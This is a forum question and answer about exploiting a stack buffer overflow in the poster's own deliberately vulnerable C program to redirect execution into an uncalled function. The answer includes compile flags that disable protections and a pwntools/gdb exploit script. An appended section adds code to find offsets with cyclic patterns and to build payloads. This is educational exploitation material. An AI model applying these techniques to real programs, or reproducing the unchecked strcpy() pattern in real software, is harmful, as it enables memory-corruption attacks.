iT邦幫忙

A question about buffer overflow


I don't know how to use gdb to change the return address.
I would like the program to end up jumping to myprivatetest().
Here is the code:

#include <stdio.h>
#include <stdlib.h>   /* system() */
#include <string.h>

int UPtest(char *, char *, char *);
void myprivatetest(void);

int main(int argc, char **argv) {
  /* No argc check: the program expects exactly three arguments. */
  if (UPtest(argv[1], argv[2], argv[3])) {
    printf("Access granted...\n");
  } else {
    printf("Wrong username and password!!!!\n");
  }
  return 0;
}

int UPtest(char *a1, char *a2, char *a3) {
  char Uid[29], Uname[27], Upass[72];

  /* strcpy() never checks the destination size: each of these copies can
     run past its buffer and overwrite the saved return address. */
  strcpy(Uid, a1);
  strcpy(Uname, a2);
  strcpy(Upass, a3);

  if (!strcmp(Uname, "Admin") && !strcmp(Upass, "PassAd007"))
    return 1;
  else
    return 0;
}

/* Never called by the program: the goal is to reach it by hijacking the
   return address of UPtest(). */
void myprivatetest(void) {
  printf("This is test code to run other system program.\n");
  system("/usr/bin/xeyes");
}

printf("Access granted...\n");
myprivatetest();

1 answer


It looks like you want to use a buffer overflow to overwrite the return address and jump to myprivatetest. Conceptually, overwriting the rip register is all that is needed. I first used gdb to find the address of myprivatetest; that address is the value to put into rip. Compile with the following command:

# -fno-stack-protector removes the stack canary, so the overwritten return
# address is not detected; -no-pie gives myprivatetest a fixed address that
# can be hardcoded. (The original line also passed -z execstack/-z noexecstack
# and -z norelro/-z relro together; the later flag wins in GNU ld and none of
# them matter for returning into an existing function.)
all:
	gcc -o test test.c -fno-stack-protector -no-pie

Then use the following script:

import subprocess
from pwn import *   # provides context; the explicit pwnlib.tubes import is not needed

# Address of myprivatetest found with gdb (0x4012c5), little-endian.
# Only the three non-zero bytes are sent: argv strings cannot contain NUL,
# strcpy() writes the terminating NUL for us, and the remaining high bytes
# of the saved return address are already zero in a non-PIE binary.
target = b'\xc5\x12@'
print(target)
arg1 = b"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ"
# 72 bytes of padding from the start of Uname reach the saved return address
# in this build; the offset depends on the compiler's stack layout.
arg2 = b"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMOOOOPPPPQQQQRRRRSSSS" + target
arg3 = b"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ"

args = ["gdb", "-args", "./test", arg1, arg2, arg3]
context.terminal = ['tmux', 'splitw', '-h']
subprocess.run(args)

The result is shown below.

Hope this helps~
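The answer hardcodes two numbers it found by hand: the address of myprivatetest and the 72-byte offset to the saved return address. The following is an added example (not part of the original question or answer) that shows how both are obtained without knowing gdb well: the address is read from the symbol table with nm, the offset is measured with a cyclic pattern, and the final argv payload is built with the NUL-byte constraint the original exploit silently relies on. The binary path ./test, the use of nm, and the NM_SAMPLE output are assumptions and constructed data, not output from the poster's machine.

```python
# Added example (not from the original question or answer): locate the target
# function without gdb, measure the offset to the saved return address with a
# cyclic pattern, and build an argv payload that respects the constraints the
# original exploit relies on. Paths, symbol names and NM_SAMPLE are assumptions.
import itertools
import struct
import subprocess

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"


def de_bruijn(alphabet: bytes, n: int):
    """Yield a De Bruijn sequence: every n-byte window occurs at a unique offset."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length: int, n: int = 4) -> bytes:
    """First `length` bytes of the pattern (same layout as pwntools' cyclic())."""
    return bytes(itertools.islice(de_bruijn(ALPHABET, n), length))


def cyclic_find(window: bytes, n: int = 4, limit: int = 1 << 20) -> int:
    """Offset of an n-byte window in the pattern, or -1 if not found.

    After the crash, the bytes at $rsp (x86-64 faults on the `ret` itself
    because the pattern is a non-canonical address) or in a 32-bit $eip are
    such a window; their offset is the distance from the start of the
    overflowed buffer to the saved return address.
    """
    window = bytes(window[:n])
    recent = bytearray()
    for i, b in enumerate(de_bruijn(ALPHABET, n)):
        recent.append(b)
        if len(recent) > n:
            del recent[0]
        if bytes(recent) == window:
            return i - n + 1
        if i >= limit:
            break
    return -1


def symbol_address(nm_output: str, name: str) -> int:
    """Parse `nm` output ("<hex addr> <type> <name>") for one symbol's address."""
    for line in nm_output.splitlines():
        parts = line.split()
        if len(parts) == 3 and parts[2] == name:
            return int(parts[0], 16)
    raise KeyError(f"symbol {name!r} not found")


def locate(binary: str, name: str) -> int:
    """Run nm on the binary; in a non-PIE ELF the listed address is the runtime one."""
    out = subprocess.run(["nm", binary], capture_output=True, text=True, check=True).stdout
    return symbol_address(out, name)


def addr_for_argv(addr: int) -> bytes:
    """Little-endian address with trailing NUL bytes removed.

    execve() argv strings cannot contain NUL, but strcpy() writes one
    terminator after the copy and the saved return address of a non-PIE
    binary already has zero upper bytes, so the short form lands correctly.
    An address with an interior NUL cannot be delivered through argv.
    """
    raw = struct.pack("<Q", addr).rstrip(b"\x00")
    if b"\x00" in raw:
        raise ValueError(f"{addr:#x} contains an interior NUL byte")
    return raw


def build_argv(offset: int, target: int) -> list:
    """argv for ./test: keep argv[1]/argv[3] short so only argv[2] overflows."""
    payload = b"A" * offset + addr_for_argv(target)
    return [b"user", payload, b"pass"]


# Constructed nm output, chosen to match the address used in the answer above.
NM_SAMPLE = """0000000000401136 T UPtest
00000000004012c5 T myprivatetest
0000000000401080 T main
"""

if __name__ == "__main__":
    # Step 1: a pattern long enough to pass the return address, used as argv[2].
    print(cyclic(120))
    # Step 2: after the crash, pass the 4 bytes found at $rsp to cyclic_find().
    # Step 3: build the real payload with the measured offset (72 in the answer).
    target = symbol_address(NM_SAMPLE, "myprivatetest")
    print([b"./test"] + build_argv(72, target))
```

Usage: run `./test user "$(python3 -c 'from cyc import cyclic; print(cyclic(120).decode())')" pass` under gdb, and when it stops with SIGSEGV on the `ret` of UPtest, `x/4xb $rsp` shows the four pattern bytes that landed in the saved return address; `cyclic_find(bytes([...]))` on them returns the offset to use in build_argv. Keeping argv[1] and argv[3] short matters because the three strcpy() calls run in order and a later overflowing copy would clobber what argv[2] placed, which would make the measurement ambiguous.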
